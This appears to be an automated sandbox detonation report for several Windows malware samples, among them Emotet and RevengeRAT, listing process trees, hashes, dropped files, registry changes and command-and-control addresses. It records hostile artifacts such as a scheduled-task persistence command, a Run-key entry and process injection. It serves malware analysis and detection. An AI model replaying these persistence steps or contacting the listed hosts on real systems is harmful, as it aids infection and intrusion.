C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\kja-pex

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

C:\Users\Admin\AppData\Roaming\wou\HIVTQ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5640 -ip 5640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 80

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\JSZQY

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Roaming\wou\odm.exe

MD5 71d8f6d5dc35517275bc38ebcc815f9f
SHA1 cae4e8c730de5a01d30aabeb3e5cb2136090ed8d
SHA256 fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b
SHA512 4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

C:\Users\Admin\AppData\Roaming\wou\rid.ico

MD5 a5f2dcee6a2a6047aa8fdde1ae2ce290
SHA1 7a082661c9a3431cd89ed4d9959178d60b9570f7
SHA256 7da78e767ff859970c8dae593b62f1366c2c651500eb280f0077a2245a9a8625
SHA512 e001300fc56f9bc8e9d61cb904ea6dec5ca447729015c9ff3dccc021f319fcce57ebaabb196a56f80d249dfbb88b4a0a273858cf14c7b9a93c10c9c8bc243d0a

C:\Users\Admin\AppData\Roaming\wou\HIVTQ

MD5 2fc79199952da8ef486b513a911b6fd4
SHA1 c840b0684f2ebdbbf603fabf4a32e629453c48d0
SHA256 a4ff9e68389eceb7e9fe4a6c428d156e9b5536e1dc1f83f05e3c69ce312f465c
SHA512 7b4fd2a5fb42fbfd4e4f5b4a19b82aa4761bf40192eef83321a034cd531e8a7309e5c68628e594435ae0869579bc251d8eef168c833dc8dbbf75e68d41ec0f4d

memory/2532-96-0x0000000000710000-0x00000000007DC000-memory.dmp

memory/2532-97-0x0000000000710000-0x00000000007DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\wou\JSZQY

MD5 9375872d82fbfe00eb4f6e608aa170d8
SHA1 b6d6f7059c025075141293cc0c1f80c1063ef75b
SHA256 a1b44347af8b2b2bf0409bb96e99f012035dc494ef44db409dbcd2bb726ff2e9
SHA512 f05e7f8c5d4edc6c41c0a2e4c63492a8578a4ae44e093396214fe422b90bd6e6d5fc98e1d8c4ee2253845a8b1a0bf202cd27450f641a8261d7f660b26162b863

C:\Users\Admin\AppData\Roaming\wou\spd

MD5 098f6bcd4621d373cade4e832627b4f6
SHA1 a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
SHA256 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
SHA512 ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff

Analysis: behavioral8

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

149s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

Signatures

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe

C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 domainht6.ml udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:80 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 google-analytics.com udp
DE 142.250.181.228:80 google-analytics.com tcp
US 8.8.8.8:53 osdsoft.com udp
US 103.224.182.253:80 osdsoft.com tcp
US 8.8.8.8:53 ww38.osdsoft.com udp
US 13.248.148.254:80 ww38.osdsoft.com tcp
US 8.8.8.8:53 linkury.s3-us-west-2.amazonaws.com udp
US 52.92.160.250:443 linkury.s3-us-west-2.amazonaws.com tcp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
GB 143.204.67.183:80 ocsp.r2m01.amazontrust.com tcp
DE 142.250.181.228:80 google-analytics.com tcp
US 8.8.8.8:53 install.portmdfmoon.com udp
US 8.8.8.8:53 install.portmdfmoon.com udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe

MD5 060404f288040959694844afbd102966
SHA1 e0525e9ef6713fd7f269a669335ce3ddaab4b6a1
SHA256 40517e822f3442a2f389a50e905f40a6a2c4930077c865e3ea7b1929405f760a
SHA512 ddf8c53e1e1888084fa5422f297cc3ba9d97f7576c36f6b633ce67ca789127f7e259e9fb374fcbced66f883dadde0717d81ecce9776770bf07d8cf3b94b1a43f

Analysis: behavioral18

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:14

Platform

win10v2004-20250502-en

Max time kernel

144s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe"

Signatures

Emotet

trojan banker emotet

Emotet family

emotet

Emotet payload

trojan banker
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\odbcad32\FXSRESM.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\odbcad32\FXSRESM.exe C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\notepad.exe C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A
File opened for modification C:\Windows\notepad.exe C:\Windows\SysWOW64\odbcad32\FXSRESM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\odbcad32\FXSRESM.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe

"C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe"

C:\Windows\SysWOW64\odbcad32\FXSRESM.exe

"C:\Windows\SysWOW64\odbcad32\FXSRESM.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
JM 72.27.212.209:8080 tcp
US 172.125.40.123:80 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
SG 185.201.9.197:8080 tcp
US 64.207.182.168:8080 tcp
DE 51.89.36.180:443 tcp
US 24.179.13.119:80 tcp

Files

memory/1592-7-0x0000000000470000-0x000000000047F000-memory.dmp

memory/1592-4-0x0000000002260000-0x0000000002270000-memory.dmp

memory/1592-0-0x0000000002240000-0x0000000002252000-memory.dmp

C:\Windows\SysWOW64\odbcad32\FXSRESM.exe

MD5 8b273f919ea075cff8c652c51a301bbb
SHA1 917baa65532900d1dbd0a3925a898ecf0b4cd569
SHA256 f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a
SHA512 b71c4aa7259535889126742045c820f703a5a9caa49b8496620d4566da22f65706e7e617d34ac08e741d96da0f98e617daac2ca02882ab887a4f98fe432d699e

memory/1592-9-0x0000000000400000-0x0000000000442000-memory.dmp

memory/5280-10-0x0000000000510000-0x0000000000522000-memory.dmp

memory/5280-14-0x0000000000530000-0x0000000000540000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:12

Platform

win10v2004-20250502-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:14

Platform

win10v2004-20250502-en

Max time kernel

149s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\REVENGE-RAT.js

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\inststa.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msta.exe C:\Users\Admin\Documents\foldani.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msta.exe C:\Users\Admin\Documents\foldani.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cjnsta.vbs C:\Users\Admin\Documents\foldani.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tenakt.js C:\Users\Admin\Documents\foldani.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hadiya.lnk C:\Users\Admin\Documents\foldani.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\elBV.URL C:\Users\Admin\Documents\foldani.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tenakna = "C:\\Users\\Admin\\Documents\\foldani.exe" C:\Users\Admin\Documents\foldani.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4760 set thread context of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4660 set thread context of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 3364 set thread context of 3396 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\foldani.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\foldani.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4548 wrote to memory of 4760 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4548 wrote to memory of 4760 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4548 wrote to memory of 4760 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4760 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 884 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\Documents\foldani.exe
PID 884 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\Documents\foldani.exe
PID 884 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 4660 wrote to memory of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 2668 wrote to memory of 960 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 960 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 960 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 960 wrote to memory of 2284 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 960 wrote to memory of 2284 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 960 wrote to memory of 2284 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 4720 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\SysWOW64\schtasks.exe
PID 2668 wrote to memory of 4720 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\SysWOW64\schtasks.exe
PID 2668 wrote to memory of 4720 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\SysWOW64\schtasks.exe
PID 2668 wrote to memory of 3332 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 3332 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 3332 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 4740 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\foldani.exe
PID 4740 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\foldani.exe
PID 4740 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\foldani.exe
PID 3332 wrote to memory of 4372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3332 wrote to memory of 4372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3332 wrote to memory of 4372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 4812 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4812 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4812 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 4812 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4812 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4812 wrote to memory of 3372 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 2444 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 2444 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 2444 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2444 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2444 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2444 wrote to memory of 3472 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 4668 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4668 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 4668 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 4668 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4668 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 4668 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 1676 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 1676 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 1676 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1676 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1676 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1676 wrote to memory of 776 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2668 wrote to memory of 3876 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 2668 wrote to memory of 3876 N/A C:\Users\Admin\Documents\foldani.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\REVENGE-RAT.js

C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe

"C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"

C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe

"C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe"

C:\Users\Admin\Documents\foldani.exe

"C:\Users\Admin\Documents\foldani.exe"

C:\Users\Admin\Documents\foldani.exe

"C:\Users\Admin\Documents\foldani.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ketljfyr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC3F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1592735C24D046A485936B9EBA6C6822.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\foldani.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 10 /tn "bladzabi" /tr "C:\Users\Admin\Documents\foldani.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pjxkzgrh.cmdline"

C:\Users\Admin\Documents\foldani.exe

C:\Users\Admin\Documents\foldani.exe

